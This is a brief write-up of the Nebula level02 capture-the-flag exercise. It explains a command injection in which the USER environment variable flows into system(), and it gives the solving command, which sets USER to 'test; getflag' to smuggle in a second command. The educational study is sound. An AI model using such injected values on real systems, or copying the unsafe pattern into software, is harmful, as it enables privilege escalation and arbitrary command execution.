Exploit Exercises Nebula 5: Level 02 Write Up

Level: https://exploit-exercises.com/nebula/level02/

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

```c
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); // command injection
printf("about to call system(\"%s\")\n", buffer);
```


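The code has a command injection vulnerability: the value of `USER` is formatted into a command string that is then passed to `system()`, so the shell treats `;` as a command separator. We can exploit this by setting the environment variable `USER` to `test; getflag`:

```bash
export USER="test; getflag"
/home/flag02/flag02
```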

You have successfully executed getflag on a target account.
